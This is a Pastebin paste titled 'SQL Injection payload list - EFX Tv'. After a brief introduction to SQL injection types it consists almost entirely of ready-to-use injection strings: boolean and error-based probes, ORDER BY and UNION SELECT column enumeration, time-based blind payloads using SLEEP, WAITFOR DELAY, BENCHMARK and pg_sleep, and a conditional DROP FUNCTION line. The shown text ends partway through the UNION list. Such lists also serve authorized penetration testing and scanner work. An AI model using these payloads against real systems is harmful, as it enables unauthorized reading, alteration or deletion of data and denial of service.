API tools faq
paste
Advertisement
efxtv

SQL Injection payload list - EFX Tv

efxtv
Jun 9th, 2023
321
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 47.57 KB | None | 0 0
raw download clone embed print report
  1. Join us on telegram https://t.me/efxtv
  2.  
  3. # SQL Injection
  4.  
  5. In this section, we'll explain what SQL injection is, describe some common examples, explain how to find and exploit various kinds of SQL injection vulnerabilities, and summarize how to prevent SQL injection.
  6. What is SQL injection (SQLi)?
  7.  
  8. #
  9. SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application's content or behavior.
  10. ____________________________________________________________________________________________________________________
  11. ____________________________________________________________________________________________________________________
  12. # Types of SQL Injections: ( https://t.me/c/1480784123/1546 IMAGE Source for Paid Users)
  13. # I. In-band SQLi
  14. a) Error-based SQLi
  15. b) Union-based SQLi
  16. # II. Inferential (Blind) SQLi
  17. a) Boolean
  18. b) Time-based
  19. # III. Out-of-band SQLi
  20.  
  21. ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________
  22. In some situations, an attacker can escalate an SQL injection attack to compromise the underlying server or other back-end infrastructure, or perform a denial-of-service attack.
  23.  
  24. # Generic SQL Injection Payloads
  25. '
  26. ''
  27. `
  28. ``
  29. ,
  30. "
  31. ""
  32. /
  33. //
  34. \
  35. \\
  36. ;
  37. ' or "
  38. -- or #
  39. ' OR '1
  40. ' OR 1 -- -
  41. " OR "" = "
  42. " OR 1 = 1 -- -
  43. ' OR '' = '
  44. '='
  45. 'LIKE'
  46. '=0--+
  47. OR 1=1
  48. ' OR 'x'='x
  49. ' AND id IS NULL; --
  50. '''''''''''''UNION SELECT '2
  51. %00
  52. /*…*/
  53. + addition, concatenate (or space in url)
  54. || (double pipe) concatenate
  55. % wildcard attribute indicator
  56.  
  57. @variable local variable
  58. @@variable global variable
  59.  
  60.  
  61. # Numeric
  62. AND 1
  63. AND 0
  64. AND true
  65. AND false
  66. 1-false
  67. 1-true
  68. 1*56
  69. -2
  70.  
  71.  
  72. 1' ORDER BY 1--+
  73. 1' ORDER BY 2--+
  74. 1' ORDER BY 3--+
  75.  
  76. 1' ORDER BY 1,2--+
  77. 1' ORDER BY 1,2,3--+
  78.  
  79. 1' GROUP BY 1,2,--+
  80. 1' GROUP BY 1,2,3--+
  81. ' GROUP BY columnnames having 1=1 --
  82.  
  83.  
  84. -1' UNION SELECT 1,2,3--+
  85. ' UNION SELECT sum(columnname ) from tablename --
  86.  
  87.  
  88. -1 UNION SELECT 1 INTO @,@
  89. -1 UNION SELECT 1 INTO @,@,@
  90.  
  91. 1 AND (SELECT * FROM Users) = 1
  92.  
  93. ' AND MID(VERSION(),1,1) = '5';
  94.  
  95. ' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --
  96.  
  97.  
  98. Finding the table name
  99.  
  100.  
  101. Time-Based:
  102. ,(select * from (select(sleep(10)))a)
  103. %2c(select%20*%20from%20(select(sleep(10)))a)
  104. ';WAITFOR DELAY '0:0:30'--
  105.  
  106. Comments:
  107.  
  108. # Hash comment
  109. /* C-style comment
  110. -- - SQL comment
  111. ;%00 Nullbyte
  112. ` Backtick
  113.  
  114. _________________________________________________________________________________________________
  115. #Generic Error Based Payloads
  116. OR 1=1
  117. OR 1=0
  118. OR x=x
  119. OR x=y
  120. OR 1=1#
  121. OR 1=0#
  122. OR x=x#
  123. OR x=y#
  124. OR 1=1--
  125. OR 1=0--
  126. OR x=x--
  127. OR x=y--
  128. OR 3409=3409 AND ('pytW' LIKE 'pytW
  129. OR 3409=3409 AND ('pytW' LIKE 'pytY
  130. HAVING 1=1
  131. HAVING 1=0
  132. HAVING 1=1#
  133. HAVING 1=0#
  134. HAVING 1=1--
  135. HAVING 1=0--
  136. AND 1=1
  137. AND 1=0
  138. AND 1=1--
  139. AND 1=0--
  140. AND 1=1#
  141. AND 1=0#
  142. AND 1=1 AND '%'='
  143. AND 1=0 AND '%'='
  144. AND 1083=1083 AND (1427=1427
  145. AND 7506=9091 AND (5913=5913
  146. AND 1083=1083 AND ('1427=1427
  147. AND 7506=9091 AND ('5913=5913
  148. AND 7300=7300 AND 'pKlZ'='pKlZ
  149. AND 7300=7300 AND 'pKlZ'='pKlY
  150. AND 7300=7300 AND ('pKlZ'='pKlZ
  151. AND 7300=7300 AND ('pKlZ'='pKlY
  152. AS INJECTX WHERE 1=1 AND 1=1
  153. AS INJECTX WHERE 1=1 AND 1=0
  154. AS INJECTX WHERE 1=1 AND 1=1#
  155. AS INJECTX WHERE 1=1 AND 1=0#
  156. AS INJECTX WHERE 1=1 AND 1=1--
  157. AS INJECTX WHERE 1=1 AND 1=0--
  158. WHERE 1=1 AND 1=1
  159. WHERE 1=1 AND 1=0
  160. WHERE 1=1 AND 1=1#
  161. WHERE 1=1 AND 1=0#
  162. WHERE 1=1 AND 1=1--
  163. WHERE 1=1 AND 1=0--
  164. ORDER BY 1--
  165. ORDER BY 2--
  166. ORDER BY 3--
  167. ORDER BY 4--
  168. ORDER BY 5--
  169. ORDER BY 6--
  170. ORDER BY 7--
  171. ORDER BY 8--
  172. ORDER BY 9--
  173. ORDER BY 10--
  174. ORDER BY 11--
  175. ORDER BY 12--
  176. ORDER BY 13--
  177. ORDER BY 14--
  178. ORDER BY 15--
  179. ORDER BY 16--
  180. ORDER BY 17--
  181. ORDER BY 18--
  182. ORDER BY 19--
  183. ORDER BY 20--
  184. ORDER BY 21--
  185. ORDER BY 22--
  186. ORDER BY 23--
  187. ORDER BY 24--
  188. ORDER BY 25--
  189. ORDER BY 26--
  190. ORDER BY 27--
  191. ORDER BY 28--
  192. ORDER BY 29--
  193. ORDER BY 30--
  194. ORDER BY 31337--
  195. ORDER BY 1#
  196. ORDER BY 2#
  197. ORDER BY 3#
  198. ORDER BY 4#
  199. ORDER BY 5#
  200. ORDER BY 6#
  201. ORDER BY 7#
  202. ORDER BY 8#
  203. ORDER BY 9#
  204. ORDER BY 10#
  205. ORDER BY 11#
  206. ORDER BY 12#
  207. ORDER BY 13#
  208. ORDER BY 14#
  209. ORDER BY 15#
  210. ORDER BY 16#
  211. ORDER BY 17#
  212. ORDER BY 18#
  213. ORDER BY 19#
  214. ORDER BY 20#
  215. ORDER BY 21#
  216. ORDER BY 22#
  217. ORDER BY 23#
  218. ORDER BY 24#
  219. ORDER BY 25#
  220. ORDER BY 26#
  221. ORDER BY 27#
  222. ORDER BY 28#
  223. ORDER BY 29#
  224. ORDER BY 30#
  225. ORDER BY 31337#
  226. ORDER BY 1
  227. ORDER BY 2
  228. ORDER BY 3
  229. ORDER BY 4
  230. ORDER BY 5
  231. ORDER BY 6
  232. ORDER BY 7
  233. ORDER BY 8
  234. ORDER BY 9
  235. ORDER BY 10
  236. ORDER BY 11
  237. ORDER BY 12
  238. ORDER BY 13
  239. ORDER BY 14
  240. ORDER BY 15
  241. ORDER BY 16
  242. ORDER BY 17
  243. ORDER BY 18
  244. ORDER BY 19
  245. ORDER BY 20
  246. ORDER BY 21
  247. ORDER BY 22
  248. ORDER BY 23
  249. ORDER BY 24
  250. ORDER BY 25
  251. ORDER BY 26
  252. ORDER BY 27
  253. ORDER BY 28
  254. ORDER BY 29
  255. ORDER BY 30
  256. ORDER BY 31337
  257. RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
  258. RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
  259. IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--
  260. IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--
  261. %' AND 8310=8310 AND '%'='
  262. %' AND 8310=8311 AND '%'='
  263. and (select substring(@@version,1,1))='X'
  264. and (select substring(@@version,1,1))='M'
  265. and (select substring(@@version,2,1))='i'
  266. and (select substring(@@version,2,1))='y'
  267. and (select substring(@@version,3,1))='c'
  268. and (select substring(@@version,3,1))='S'
  269. and (select substring(@@version,3,1))='X'
  270.  
  271. _________________________________________________________________________________________________
  272. #Generic Time Based SQL Injection Payloads
  273. # from wapiti
  274. sleep(5)#
  275. 1 or sleep(5)#
  276. " or sleep(5)#
  277. ' or sleep(5)#
  278. " or sleep(5)="
  279. ' or sleep(5)='
  280. 1) or sleep(5)#
  281. ") or sleep(5)="
  282. ') or sleep(5)='
  283. 1)) or sleep(5)#
  284. ")) or sleep(5)="
  285. ')) or sleep(5)='
  286. ;waitfor delay '0:0:5'--
  287. );waitfor delay '0:0:5'--
  288. ';waitfor delay '0:0:5'--
  289. ";waitfor delay '0:0:5'--
  290. ');waitfor delay '0:0:5'--
  291. ");waitfor delay '0:0:5'--
  292. ));waitfor delay '0:0:5'--
  293. '));waitfor delay '0:0:5'--
  294. "));waitfor delay '0:0:5'--
  295. benchmark(10000000,MD5(1))#
  296. 1 or benchmark(10000000,MD5(1))#
  297. " or benchmark(10000000,MD5(1))#
  298. ' or benchmark(10000000,MD5(1))#
  299. 1) or benchmark(10000000,MD5(1))#
  300. ") or benchmark(10000000,MD5(1))#
  301. ') or benchmark(10000000,MD5(1))#
  302. 1)) or benchmark(10000000,MD5(1))#
  303. ")) or benchmark(10000000,MD5(1))#
  304. ')) or benchmark(10000000,MD5(1))#
  305. pg_sleep(5)--
  306. 1 or pg_sleep(5)--
  307. " or pg_sleep(5)--
  308. ' or pg_sleep(5)--
  309. 1) or pg_sleep(5)--
  310. ") or pg_sleep(5)--
  311. ') or pg_sleep(5)--
  312. 1)) or pg_sleep(5)--
  313. ")) or pg_sleep(5)--
  314. ')) or pg_sleep(5)--
  315. AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
  316. AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
  317. AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
  318. AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
  319. AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
  320. SLEEP(5)#
  321. SLEEP(5)--
  322. SLEEP(5)="
  323. SLEEP(5)='
  324. or SLEEP(5)
  325. or SLEEP(5)#
  326. or SLEEP(5)--
  327. or SLEEP(5)="
  328. or SLEEP(5)='
  329. waitfor delay '00:00:05'
  330. waitfor delay '00:00:05'--
  331. waitfor delay '00:00:05'#
  332. benchmark(50000000,MD5(1))
  333. benchmark(50000000,MD5(1))--
  334. benchmark(50000000,MD5(1))#
  335. or benchmark(50000000,MD5(1))
  336. or benchmark(50000000,MD5(1))--
  337. or benchmark(50000000,MD5(1))#
  338. pg_SLEEP(5)
  339. pg_SLEEP(5)--
  340. pg_SLEEP(5)#
  341. or pg_SLEEP(5)
  342. or pg_SLEEP(5)--
  343. or pg_SLEEP(5)#
  344. '\"
  345. AnD SLEEP(5)
  346. AnD SLEEP(5)--
  347. AnD SLEEP(5)#
  348. &&SLEEP(5)
  349. &&SLEEP(5)--
  350. &&SLEEP(5)#
  351. ' AnD SLEEP(5) ANd '1
  352. '&&SLEEP(5)&&'1
  353. ORDER BY SLEEP(5)
  354. ORDER BY SLEEP(5)--
  355. ORDER BY SLEEP(5)#
  356. (SELECT * FROM (SELECT(SLEEP(5)))ecMj)
  357. (SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
  358. (SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
  359. +benchmark(3200,SHA1(1))+'
  360. + SLEEP(10) + '
  361. RANDOMBLOB(500000000/2)
  362. AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
  363. OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
  364. RANDOMBLOB(1000000000/2)
  365. AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
  366. OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
  367. SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/
  368.  
  369. _________________________________________________________________________________________________
  370. #Generic Union Select Payloads
  371. ORDER BY SLEEP(5)
  372. ORDER BY 1,SLEEP(5)
  373. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))
  374. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4
  375. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5
  376. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6
  377. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7
  378. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8
  379. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9
  380. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10
  381. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11
  382. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12
  383. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13
  384. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14
  385. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14
  386. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15
  387. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16
  388. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17
  389. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
  390. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
  391. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
  392. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
  393. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
  394. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
  395. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
  396. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
  397. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
  398. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
  399. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
  400. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
  401. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
  402. ORDER BY SLEEP(5)#
  403. ORDER BY 1,SLEEP(5)#
  404. ORDER BY 1,SLEEP(5),3#
  405. ORDER BY 1,SLEEP(5),3,4#
  406. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5#
  407. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6#
  408. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7#
  409. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8#
  410. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9#
  411. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10#
  412. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11#
  413. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12#
  414. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13#
  415. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#
  416. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#
  417. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15#
  418. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16#
  419. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17#
  420. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
  421. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
  422. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
  423. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
  424. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
  425. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
  426. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
  427. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
  428. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
  429. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
  430. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
  431. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
  432. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
  433. ORDER BY SLEEP(5)--
  434. ORDER BY 1,SLEEP(5)--
  435. ORDER BY 1,SLEEP(5),3--
  436. ORDER BY 1,SLEEP(5),3,4--
  437. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5--
  438. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6--
  439. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7--
  440. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8--
  441. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9--
  442. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10--
  443. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11--
  444. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12--
  445. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13--
  446. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14--
  447. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14--
  448. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15--
  449. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16--
  450. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
  451. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
  452. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
  453. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
  454. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
  455. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
  456. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
  457. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
  458. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
  459. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
  460. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
  461. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
  462. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
  463. ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
  464. UNION ALL SELECT 1
  465. UNION ALL SELECT 1,2
  466. UNION ALL SELECT 1,2,3
  467. UNION ALL SELECT 1,2,3,4
  468. UNION ALL SELECT 1,2,3,4,5
  469. UNION ALL SELECT 1,2,3,4,5,6
  470. UNION ALL SELECT 1,2,3,4,5,6,7
  471. UNION ALL SELECT 1,2,3,4,5,6,7,8
  472. UNION ALL SELECT 1,2,3,4,5,6,7,8,9
  473. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10
  474. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11
  475. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12
  476. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13
  477. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14
  478. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
  479. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
  480. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
  481. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
  482. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
  483. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
  484. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
  485. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
  486. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
  487. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
  488. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
  489. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
  490. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
  491. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
  492. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
  493. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
  494. UNION ALL SELECT 1#
  495. UNION ALL SELECT 1,2#
  496. UNION ALL SELECT 1,2,3#
  497. UNION ALL SELECT 1,2,3,4#
  498. UNION ALL SELECT 1,2,3,4,5#
  499. UNION ALL SELECT 1,2,3,4,5,6#
  500. UNION ALL SELECT 1,2,3,4,5,6,7#
  501. UNION ALL SELECT 1,2,3,4,5,6,7,8#
  502. UNION ALL SELECT 1,2,3,4,5,6,7,8,9#
  503. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10#
  504. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11#
  505. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12#
  506. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13#
  507. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14#
  508. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15#
  509. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
  510. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
  511. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
  512. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
  513. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
  514. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
  515. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
  516. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
  517. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
  518. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
  519. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
  520. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
  521. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
  522. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
  523. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
  524. UNION ALL SELECT 1--
  525. UNION ALL SELECT 1,2--
  526. UNION ALL SELECT 1,2,3--
  527. UNION ALL SELECT 1,2,3,4--
  528. UNION ALL SELECT 1,2,3,4,5--
  529. UNION ALL SELECT 1,2,3,4,5,6--
  530. UNION ALL SELECT 1,2,3,4,5,6,7--
  531. UNION ALL SELECT 1,2,3,4,5,6,7,8--
  532. UNION ALL SELECT 1,2,3,4,5,6,7,8,9--
  533. UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10--
